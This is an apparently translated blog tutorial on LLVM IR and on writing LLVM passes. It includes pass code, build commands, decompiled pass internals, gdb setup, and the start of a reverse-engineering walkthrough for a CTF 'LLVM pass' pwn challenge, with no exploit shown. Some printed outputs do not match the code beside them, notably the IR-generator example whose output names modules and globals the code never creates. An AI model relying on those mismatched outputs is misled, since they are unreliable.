[ayoung@blog posts]$ cat ./llvm pass.md

llvm pass

[Last modified: 2024-09-11]

LLVM

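LLVM is a compiler framework. As a framework it is built from a set of functional modules, and both clang and lld can be regarded as components of LLVM. (Figure: a simplified view of the Clang/LLVM architecture.)

LLVM IR

LLVM IR is LLVM's intermediate representation. Documentation: https://llvm.org/docs/LangRef.html

In LLVM, IR has three equivalent forms: the human-readable text form (.ll), the on-disk bitcode form (.bc), and the in-memory representation used by the compiler itself.

Basic syntax

Global variable: @global_variable = global i32 0
Stack variable: %local_variable = alloca i32

Both names are actually of type ptr: each points to the i32-sized region of memory where the variable lives. To work with the values themselves you must use the load and store instructions.

load reads a value. The following reads the i32 that the ptr @global_variable points to into virtual register %1:
%1 = load i32, ptr @global_variable

store writes a value. The following writes the i32 value 1 into the memory that the global ptr @global_variable points to:
store i32 1, ptr @global_variable

Pointer type: ptr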

C:

int x, y;
size_t address_of_x = (size_t)&x;
size_t address_of_y = address_of_x - sizeof(int);
int also_y = *(int *)address_of_y;

IR:

%x = alloca i32 ; %x is of type ptr, which is the address of variable x
%y = alloca i32 ; %y is of type ptr, which is the address of variable y
%address_of_x = ptrtoint ptr %x to i64
%address_of_y = sub i64 %address_of_x, 4
%also_y = inttoptr i64 %address_of_y to ptr ; %also_y is of type ptr, which is the address of variable y
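The ptrtoint / sub / inttoptr sequence above can be mirrored in C++ with std::uintptr_t. This is a minimal sketch, not the author's code: the helper names are made up for illustration, and it uses two adjacent array elements rather than two separate locals, because array layout is guaranteed while the relative stack position of x and y is not.

```cpp
#include <cstdint>

// Reads the int stored immediately before `element` by doing the address
// arithmetic on an integer, mirroring ptrtoint -> sub -> inttoptr -> load.
int read_previous_element(const int *element) {
    std::uintptr_t address = reinterpret_cast<std::uintptr_t>(element);  // ptrtoint
    std::uintptr_t previous = address - sizeof(int);                      // sub
    const int *previous_ptr = reinterpret_cast<const int *>(previous);    // inttoptr
    return *previous_ptr;                                                 // load
}

// Hypothetical demo helper: values[1] minus sizeof(int) is values[0].
int demo_read_previous() {
    int values[2] = {11, 22};
    return read_previous_element(&values[1]);
}
```

Calling demo_read_previous() reads values[0] through the integer round trip.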

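Aggregate types: arrays and structs

C's int[4] corresponds to: %a = alloca [4 x i32]

A similar syntax initializes an array: @global_array = global [4 x i32] [i32 0, i32 1, i32 2, i32 3]

In particular, because a string is just an array of characters underneath, LLVM IR provides syntactic sugar for it: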

@global_string = global [12 x i8] c"Hello world\00"
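The length 12 in [12 x i8] counts the terminating \00 as well as the 11 visible characters. A small C++ check of the same fact, offered as a sketch (the function name is hypothetical):

```cpp
#include <cstddef>

// sizeof on a string literal yields the size of its array type, which
// includes the trailing '\0': 11 characters + 1 terminator.
constexpr std::size_t hello_array_size() {
    return sizeof("Hello world");
}

static_assert(hello_array_size() == 12, "matches [12 x i8] in the IR");
```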

A struct in C:

struct MyStruct {
    int x;
    char y;
};

The corresponding IR:

%MyStruct = type {
    i32,
    i8
}

Initializing a struct:

@global_structure = global %MyStruct { i32 1, i8 0 }
; or
@global_structure = global { i32, i8 } { i32 1, i8 0 }

getelementptr: accessing an aggregate through a pointer

C:

struct MyStruct {
    int x;
    int y;
};

void foo(struct MyStruct *my_structs_ptr) {
    int my_y = my_structs_ptr[2].y;
}

IR:

%MyStruct = type { i32, i32 }

define void @foo(ptr %my_structs_ptr) {
    %my_y_in_stack = alloca i32
    %my_y_ptr = getelementptr %MyStruct, ptr %my_structs_ptr, i64 2, i32 1
    %my_y_val = load i32, ptr %my_y_ptr
    store i32 %my_y_val, ptr %my_y_in_stack
    ret void
}

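Key point: this getelementptr takes four arguments: the element type (%MyStruct), the base pointer (%my_structs_ptr), a first index (i64 2) that steps over whole %MyStruct elements just like my_structs_ptr[2], and a second index (i32 1) that selects field 1 of that struct, i.e. y. The instruction only computes an address; the load that follows reads the value.

More on how getelementptr works: https://llvm.org/docs/GetElementPtr.html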
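The address arithmetic behind the getelementptr in foo can be written out in plain C++. This is a sketch under the assumption that MyStruct has the same layout as in the C example; the function names are invented for illustration.

```cpp
#include <cstddef>

struct MyStruct {
    int x;
    int y;
};

// Byte offset computed by
//   getelementptr %MyStruct, ptr %p, i64 index, i32 1
// First index: skip `index` whole MyStruct elements.
// Second index: select field 1 (y) inside that element.
std::size_t gep_offset_of_y(std::size_t index) {
    return index * sizeof(MyStruct) + offsetof(MyStruct, y);
}

// Cross-checks the formula against what &array[index].y actually yields.
bool matches_pointer_arithmetic(std::size_t index) {
    static MyStruct array[4] = {};
    const char *base = reinterpret_cast<const char *>(array);
    const char *field = reinterpret_cast<const char *>(&array[index].y);
    return static_cast<std::size_t>(field - base) == gep_offset_of_y(index);
}
```

With a 4-byte int, gep_offset_of_y(2) is 2 * 8 + 4 = 20 bytes past the base pointer.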

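LLVM tools

opt is the IR-level optimizer; its input and output are both LLVM IR.

llvm-link is the IR-level linker; it links IR files together.

llvm-as is the assembler for LLVM IR: it translates a .ll file into a .bc file. Within the LLVM project, the .ll form is called LLVM assembly.

llvm-dis is the inverse of llvm-as: the IR disassembler, which translates a .bc file back into a .ll file.

clang: passing -emit-llvm together with -S or -c produces a .ll or .bc file respectively, so the Clang front end can be run separately from the LLVM back end.

.c -> .ll: clang -emit-llvm -S a.c -o a.ll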
.c -> .bc: clang -emit-llvm -c a.c -o a.bc
.ll -> .bc: llvm-as a.ll -o a.bc
.bc -> .ll: llvm-dis a.bc -o a.ll
.bc -> .s: llc a.bc -o a.s

LLVM PASS

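Next, a look at what an LLVM pass is. Reading list:
http://www.aosabook.org/en/llvm.html
https://zhuanlan.zhihu.com/p/122522485
https://llvm.org/docs/WritingAnLLVMPass.html (official)
https://llvm.org/devmtg/2019-04/slides/Tutorial-Bridgers-LLVM_IR_tutorial.pdf

The LLVM pass framework is an important part of the LLVM system, because passes are where most of the interesting parts of the compiler live. Passes perform the transformations and optimizations that make up the compiler, they build the analysis results that those transformations use, and above all they are a structuring technique for compiler code.

All LLVM passes are subclasses of Pass and implement their functionality by overriding virtual methods inherited from Pass. Depending on how your pass works, you should inherit from ModulePass, CallGraphSCCPass, FunctionPass, LoopPass, or RegionPass. These classes give the system more information about what your pass does and how it can be combined with other passes. An important feature of the LLVM pass framework is that it schedules passes to run efficiently, based on the constraints your pass satisfies (as indicated by the class it derives from). This describes the legacy pass manager, which the examples below use.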

Hello world of passes

Environment setup: install the prebuilt packages

$ sudo apt install llvm
$ sudo apt install clang

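A specific version can be selected with sudo apt install llvm-x.y

The code is walked through piece by piece below. After using namespace llvm; pulls in the llvm namespace, namespace { opens an anonymous namespace. Anonymous namespaces are to C++ what the static keyword is to C (at global scope): everything declared inside is visible only to the current file.

Next, struct Hello : public FunctionPass { declares a Hello class that is a subclass of FunctionPass. A FunctionPass operates on one function at a time.

Then comes the pass identifier that LLVM uses to identify the pass, which lets LLVM avoid relying on expensive C++ runtime type information (RTTI):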

static char ID;
Hello() : FunctionPass(ID) {}

Declare a runOnFunction method, which overrides the abstract virtual method inherited from FunctionPass.

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    return false;
  }
}; // end of struct Hello
}  // end of anonymous namespace

char Hello::ID = 0; initializes the pass ID. LLVM uses the address of ID to identify a pass, so the initial value does not matter.
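Why the address matters more than the value can be shown without LLVM at all. The following is a toy sketch: PassA, PassB, PassID, id_of and same_pass are hypothetical names, not LLVM APIs. Both IDs hold the value 0, yet they are distinct objects and therefore compare as different identifiers.

```cpp
// Two hypothetical pass classes, each with its own static ID byte.
struct PassA { static char ID; };
struct PassB { static char ID; };

char PassA::ID = 0;  // same initial value ...
char PassB::ID = 0;  // ... but a different object, hence a different address

// In this toy model an identifier is simply the address of the ID member.
using PassID = const void *;

template <typename PassT>
PassID id_of() {
    return &PassT::ID;
}

// Two identifiers denote the same pass exactly when the addresses match.
bool same_pass(PassID lhs, PassID rhs) {
    return lhs == rhs;
}
```

Comparing two pointers is cheap and needs no RTTI, which fits the motivation given above for the ID member.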

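Finally, register the Hello class, giving it the command-line argument "hello" and the name "Hello World Pass". The last two arguments describe its behaviour: if a pass walks the CFG without modifying it, the third argument is set to true; if a pass is an analysis pass, such as the dominator tree pass, true is passed as the fourth argument.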

static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);
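The registration line works because a static object's constructor runs when the shared object is loaded. The pattern can be sketched in isolation as a small self-registering factory. Everything here (ToyPass, ToyRegisterPass, toy_registry, create_toy_pass) is a hypothetical stand-in written for illustration and does not reproduce LLVM's actual PassRegistry.

```cpp
#include <functional>
#include <map>
#include <memory>
#include <string>

struct ToyPass {
    virtual ~ToyPass() = default;
    virtual std::string name() const = 0;
};

using ToyFactory = std::function<std::unique_ptr<ToyPass>()>;

// Function-local static: safe to use from other static initializers.
std::map<std::string, ToyFactory> &toy_registry() {
    static std::map<std::string, ToyFactory> instance;
    return instance;
}

// Constructing one of these records "argument -> default constructor".
template <typename PassT>
struct ToyRegisterPass {
    explicit ToyRegisterPass(const std::string &argument) {
        toy_registry()[argument] = [] {
            return std::unique_ptr<ToyPass>(new PassT());
        };
    }
};

namespace {
struct ToyHello : ToyPass {
    std::string name() const override { return "Hello World Pass"; }
};
}  // end of anonymous namespace

// Runs before main(), just like the static RegisterPass<Hello> object.
static ToyRegisterPass<ToyHello> toy_registration("hello");

// What a driver would do when it sees the command-line argument.
std::unique_ptr<ToyPass> create_toy_pass(const std::string &argument) {
    auto found = toy_registry().find(argument);
    if (found == toy_registry().end()) return nullptr;
    return found->second();
}
```

A driver can then call create_toy_pass("hello") without knowing the ToyHello type, which is hidden in an anonymous namespace just like Hello.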

The full code follows. LLVM calls runOnFunction once for every function in the IR, and the pass prints each function's name.

#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/Support/raw_ostream.h"

#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"

using namespace llvm;

namespace {
struct Hello : public FunctionPass {
  static char ID;
  Hello() : FunctionPass(ID) {}

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    return false;
  }
}; // end of struct Hello
}  // end of anonymous namespace

char Hello::ID = 0;
static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);

static RegisterStandardPasses Y(
    PassManagerBuilder::EP_EarlyAsPossible,
    [](const PassManagerBuilder &Builder,
       legacy::PassManagerBase &PM) { PM.add(new Hello()); });

Compile

clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`

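This produces LLVMHello.so.

The opt command can now run an LLVM program through the pass. Because the pass was registered with RegisterPass, opt can use it as soon as the shared object is loaded.

Now write any small program: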

#include<stdio.h>
#include<stdlib.h>
int a(){return 0;}
int b(){return 0;}
int c(){return 0;}
int main(){
	printf("1!\n");
	return 0;
}

Compile it to a .ll file with clang: clang -emit-llvm -S main.c -o main.ll

; ModuleID = 'main.c'
source_filename = "main.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [4 x i8] c"1!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define i32 @a() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @b() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @c() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @main() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i32 0, i32 0))
  ret i32 0
}

declare i32 @printf(i8*, ...) #1

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}

Run it, and the pass walks the IR and prints the name of every function:

ayoung@ubuntu:~/pwn/llvm/eg$ opt -load ./LLVMHello.so -hello ./main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
Hello: b
Hello: c
Hello: main

A modified Hello world

Environment: Ubuntu 22.04

// Hello.cpp
#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Constants.h"
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Instructions.h"
#include "llvm/Support/raw_ostream.h"
#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"
using namespace llvm;
 
namespace {
  struct Hello : public FunctionPass {
    static char ID;
    Hello() : FunctionPass(ID) {}
    bool runOnFunction(Function &F) override {
      errs() << "Hello: ";
      errs().write_escaped(F.getName()) << '\n';
      SymbolTableList<BasicBlock>::const_iterator bbEnd = F.end();
      for(SymbolTableList<BasicBlock>::const_iterator bbIter = F.begin(); bbIter != bbEnd; ++bbIter){
         SymbolTableList<Instruction>::const_iterator instIter = bbIter->begin();
         SymbolTableList<Instruction>::const_iterator instEnd  = bbIter->end();
         for(; instIter != instEnd; ++instIter){
            errs() << "OpcodeName = " << instIter->getOpcodeName() << " NumOperands = " << instIter->getNumOperands() << "\n";
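            // Instruction::Call is 56 on this LLVM version; the number differs between releases
            if (instIter->getOpcode() == Instruction::Call)
            {
                if(const CallInst* call_inst = dyn_cast<CallInst>(instIter)) {
                    // getCalledFunction() returns nullptr for indirect calls
                    if (const Function* callee = call_inst->getCalledFunction())
                        errs() << callee->getName() << "\n";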
                    for (int i = 0; i < instIter->getNumOperands()-1; i++)
                    {
                        if (isa<ConstantInt>(call_inst->getOperand(i)))
                        {
                            errs() << "ConstantInt " << i << " = " << dyn_cast<ConstantInt>(call_inst->getArgOperand(i))->getZExtValue() << "\n";
                        }
                        if (isa<StoreInst>(call_inst->getOperand((i))))
                        {
                            errs() << "StoreInst " << i << " = " << dyn_cast<StoreInst>(call_inst->getArgOperand(i))->getValueOperand() << "\n";
                        }
                    }
                }
            }
            
            
         }
      }
      return false;
    }
  };
}
 
char Hello::ID = 0;
 
// Register for opt
static RegisterPass<Hello> X("Hello", "Hello World Pass");
 
// Register for clang
static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible,
  [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) {
    PM.add(new Hello());
  });

Compile (if headers are missing, find them with locate or find and add the include paths)

clang -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared mm.cpp -o LLVMHello.so `llvm-config --ldflags`

Run (using the exp from the WMCTF 2024 LLVM pass challenge)

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./opt -load ./LLVMHello.so -Hello -enable-new-pm=0 main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
OpcodeName = alloca NumOperands = 1
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_OPEN
OpcodeName = store NumOperands = 2
OpcodeName = call NumOperands = 2
WMCTF_MMAP
ConstantInt 0 = 30864
OpcodeName = call NumOperands = 2
WMCTF_READ
ConstantInt 0 = 26214
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_WRITE
OpcodeName = ret NumOperands = 0
Hello: b
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
a
OpcodeName = ret NumOperands = 0
Hello: c
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
b
OpcodeName = ret NumOperands = 0
Hello: d
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
c
OpcodeName = ret NumOperands = 0
Hello: e
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
d
OpcodeName = ret NumOperands = 0

Static analysis

__int64 __fastcall GLOBAL__sub_I_Hello_cpp(llvm::PassRegistry *a1)
{
  __int64 PassRegistry; // rax
  __int64 result; // rax
  _BYTE v3[16]; // [rsp+0h] [rbp-28h] BYREF
  __m128i v4; // [rsp+10h] [rbp-18h]

  X = "Hello World Pass";
  qword_3088 = 16LL;
  qword_3090 = "hello";
  qword_3098 = 5LL;
  qword_30A0 = &`anonymous namespace'::Hello::ID;
  word_30A8 = 0;
  byte_30AA = 0;
  xmmword_30B0 = 0LL;
  qword_30C0 = 0LL;
  qword_30C8 = llvm::callDefaultCtor<`anonymous namespace'::Hello>;
  PassRegistry = llvm::PassRegistry::getPassRegistry(a1);
  llvm::PassRegistry::registerPass(PassRegistry, &X, 0LL);
  __cxa_atexit(llvm::PassInfo::~PassInfo, &X, &_dso_handle);
  v4 = _mm_unpacklo_epi64(
         std::_Function_base::_Base_manager<$_0>::_M_manager,
         std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke);
  result = llvm::PassManagerBuilder::addGlobalExtension(0LL, v3);
  if ( v4.m128i_i64[0] )
    return (v4.m128i_i64[0])(v3, v3, 3LL);
  return result;
}

Double-click llvm::callDefaultCtor<`anonymous namespace'::Hello>:

__int64 llvm::callDefaultCtor<`anonymous namespace'::Hello>()
{
  __int64 result; // rax

  result = operator new(0x20uLL);
  *(result + 8) = 0LL;
  *(result + 16) = &`anonymous namespace'::Hello::ID;
  *(result + 24) = 3;
  *result = off_2D38;
  return result;
}

Double-clicking the pointer off_2D38 in the last assignment leads to the vtable. The last entry in the vtable, runOnFunction, is the runOnFunction method overridden in the pass.

.data.rel.ro:0000000000002D38 off_2D38        dq offset _ZN4llvm4PassD2Ev
.data.rel.ro:0000000000002D38                                         ; DATA XREF: llvm::callDefaultCtor<`anonymous namespace'::Hello>(void)+25↑o
.data.rel.ro:0000000000002D38                                         ; std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke(std::_Any_data const&,llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &)+32↑o
.data.rel.ro:0000000000002D38                                         ; llvm::Pass::~Pass()
.data.rel.ro:0000000000002D40                 dq offset _ZN12_GLOBAL__N_15HelloD0Ev ; `anonymous namespace'::Hello::~Hello()
.data.rel.ro:0000000000002D48                 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(void)
.data.rel.ro:0000000000002D50                 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &)
.data.rel.ro:0000000000002D58                 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &)
.data.rel.ro:0000000000002D60                 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &,llvm::Module const*)
.data.rel.ro:0000000000002D68                 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &,std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>> const&)
.data.rel.ro:0000000000002D70                 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &,llvm::PassManagerType)
.data.rel.ro:0000000000002D78                 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &)
.data.rel.ro:0000000000002D80                 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(void)
.data.rel.ro:0000000000002D88                 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &)
.data.rel.ro:0000000000002D90                 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(void)
.data.rel.ro:0000000000002D98                 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(void const*)
.data.rel.ro:0000000000002DA0                 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(void)
.data.rel.ro:0000000000002DA8                 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(void)
.data.rel.ro:0000000000002DB0                 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(void)
.data.rel.ro:0000000000002DB8                 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint)
.data.rel.ro:0000000000002DC0                 dq offset _ZN12_GLOBAL__N_15Hello13runOnFunctionERN4llvm8FunctionE ; `anonymous namespace'::Hello::runOnFunction(llvm::Function &)
.data.rel.ro:0000000000002DC0 _data_rel_ro    ends

Following that entry shows the body of the overridden method:

__int64 __fastcall `anonymous namespace'::Hello::runOnFunction(llvm *a1, llvm::Value *a2)
{
  llvm *v2; // rax
  __int64 v3; // rcx
  __int64 v4; // rbx
  __int64 Name; // rax
  __int64 v6; // rdx
  llvm::raw_ostream *v7; // rax
  _BYTE *v8; // rcx

  v2 = llvm::errs(a1);
  v3 = *(v2 + 3);
  if ( (*(v2 + 2) - v3) > 6 )
  {
    *(v3 + 6) = 32;
    *(v3 + 4) = 14959;
    *v3 = 1819043144;
    *(v2 + 3) += 7LL;
  }
  else
  {
    a1 = v2;
    llvm::raw_ostream::write(v2, "Hello: ", 7uLL);
  }
  v4 = llvm::errs(a1);
  Name = llvm::Value::getName(a2);
  v7 = llvm::raw_ostream::write_escaped(v4, Name, v6, 0LL);
  v8 = *(v7 + 3);
  if ( v8 >= *(v7 + 2) )
  {
    llvm::raw_ostream::write(v7, 0xAu);
  }
  else
  {
    *(v7 + 3) = v8 + 1;
    *v8 = 10;
  }
  return 0LL;
}
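The three integer constants in the fast path are simply the string "Hello: " written directly into the stream buffer in 4-, 2- and 1-byte pieces. A short sketch that decodes them, assuming the little-endian byte order of x86-64 (the helper names are made up):

```cpp
#include <cstdint>
#include <string>

// Appends the low `count` bytes of `value`, least significant byte first,
// which is how a little-endian store lays them out in memory.
void append_le(std::string &out, std::uint32_t value, int count) {
    for (int i = 0; i < count; ++i) {
        out.push_back(static_cast<char>((value >> (8 * i)) & 0xFF));
    }
}

// Rebuilds the 7 bytes written by the inlined fast path.
std::string decode_inlined_hello() {
    std::string out;
    append_le(out, 1819043144u, 4);  // *v3 = 1819043144    -> bytes 0..3
    append_le(out, 14959u, 2);       // *(v3 + 4) = 14959   -> bytes 4..5
    append_le(out, 32u, 1);          // *(v3 + 6) = 32      -> byte 6
    return out;
}
```

1819043144 is 0x6C6C6548 ("Hell"), 14959 is 0x3A6F ("o:") and 32 is a space, so the result is the same 7 bytes that the slow path passes to llvm::raw_ostream::write.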

Dynamic debugging

The official documentation also describes how to debug a pass dynamically with gdb.

First, start gdb on the opt process:

gdb opt

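opt carries a lot of debug information, so loading takes a while. Breakpoints cannot be set in the pass yet, because the shared object is not loaded until runtime, so the program has to be run and stopped after the shared object has been loaded but before the pass is invoked. The simplest way is to set a breakpoint on PassManager::run and run the program with the desired arguments. In the arguments below, -hello matches the first argument given when the class was registered in the loaded pass file.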

Reading symbols from opt...(no debugging symbols found)...done.
pwndbg> b PassManager::run
Breakpoint 1 at 0x9be40
pwndbg> set args -load ./LLVMHello.so -hello ./main.ll
pwndbg> show args
Argument list to give program being debugged when it is started is "-load ./LLVMHello.so -hello ./main.ll".
pwndbg> r

Once opt stops in PassManager::run, breakpoints can be set freely inside the pass and debugging can proceed.

Debug script debug.sh

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat debug.sh
gdb opt -x "a.gdb"
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat a.gdb 
set args -load ./WMCTF.so -WMCTF -enable-new-pm=0 main.ll
b PassManager::run
r
vmmap WMCTF
#b *(0x7ffff14c6000+0xd3cd)
b *(0x7ffff14c6000+0xD547)
b *0x7ffff14d360e
c

Aside: writing a program that emits IR

Ubuntu 22.04

// HelloGlobalVariable.cpp

#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/GlobalVariable.h"
#include "llvm/IR/IRBuilder.h"
#include "llvm/IR/LLVMContext.h"
#include "llvm/IR/Module.h"
#include "llvm/IR/Verifier.h"

using namespace llvm;

int main(int argc, char* argv[])
{
    LLVMContext context;
    IRBuilder<> builder(context);

    // Create a module
    Module* module = new Module("HelloModule", context);

    // Add a global variable
    module->getOrInsertGlobal("helloGlobalVariable", Type::getInt32Ty(context));
    GlobalVariable* globalVariable = module->getNamedGlobal("helloGlobalVariable");
    globalVariable->setLinkage(GlobalValue::CommonLinkage);
    globalVariable->setAlignment(MaybeAlign(4));

    // Add a function
    Type* voidType = Type::getVoidTy(context);
    FunctionType* functionType = FunctionType::get(voidType, false);
    Function* function = Function::Create(functionType, GlobalValue::ExternalLinkage, "HelloFunction", module);

    // Create a block
    BasicBlock* block = BasicBlock::Create(context, "entry", function);
    builder.SetInsertPoint(block);
    // Terminate the block so that the function is valid IR
    builder.CreateRetVoid();

    // Print the IR
    verifyFunction(*function);
    module->print(outs(), nullptr);

    return 0;
}

Compile

clang++ -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ -w -o HelloGlobalVariable `llvm-config --cxxflags --ldflags --system-libs --libs core` HelloGlobalVariable.cpp 

Output

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./HelloGlobalVariable 
; ModuleID = 'TriggerModule'
source_filename = "TriggerModule"

@triggerString.addr = private constant [15 x i8] c"Trigger String\00"
@globalTriggerVariable = private global i8* getelementptr inbounds ([15 x i8], [15 x i8]* @triggerString.addr, i32 0, i32 0), align 4

declare void @targetFunction()

define void @HelloFunction() {
entry:
  %loadTrigger = load i8*, i8** @globalTriggerVariable, align 8
  store i8* %loadTrigger, [15 x i8]* @triggerString.addr, align 8
  call void @targetFunction()
  ret void
}

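Example challenge

Red Hat Cup 2021: simpleVM

Start by locating runOnFunction, since custom behaviour is normally implemented by overriding it. Binaries built from LLVM passes all have a similar structure, so you can track down the vtable, and its last entry is runOnFunction.

The function checks the name of each function it is given (llvm::Value::getName); if the name is o0o0o0o0, it calls sub_6AC0 for further processing.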

__int64 __fastcall sub_6830(__int64 a1, llvm::Value *a2)
{
  __int64 v2; // rdx
  bool v4; // [rsp+7h] [rbp-119h]
  size_t v5; // [rsp+10h] [rbp-110h]
  const void *Name; // [rsp+28h] [rbp-F8h]
  __int64 v7; // [rsp+30h] [rbp-F0h]
  int v8; // [rsp+94h] [rbp-8Ch]

  Name = llvm::Value::getName(a2);
  v7 = v2;
  if ( "o0o0o0o0" )
    v5 = strlen("o0o0o0o0");
  else
    v5 = 0LL;
  v4 = 0;
  if ( v7 == v5 )
  {
    if ( v5 )
      v8 = memcmp(Name, "o0o0o0o0", v5);
    else
      v8 = 0;
    v4 = v8 == 0;
  }
  if ( v4 )
    sub_6AC0(a1, a2);
  return 0LL;
}
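Stripped of decompiler noise, sub_6830 is a length check followed by memcmp, which is how a non-NUL-terminated name (pointer plus length, as returned by getName) is compared against a literal. A minimal sketch of that logic; is_target_function is a hypothetical name:

```cpp
#include <cstddef>
#include <cstring>

// Returns true only when the (pointer, length) name equals "o0o0o0o0".
bool is_target_function(const char *name, std::size_t length) {
    static const char target[] = "o0o0o0o0";
    const std::size_t target_length = std::strlen(target);        // v5
    if (length != target_length) return false;                    // v7 == v5
    return std::memcmp(name, target, target_length) == 0;         // v8 == 0
}
```

Because the lengths must match first, a name such as o0o0o0o0x that merely starts with the target is rejected, so the exploit function has to be named exactly o0o0o0o0.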

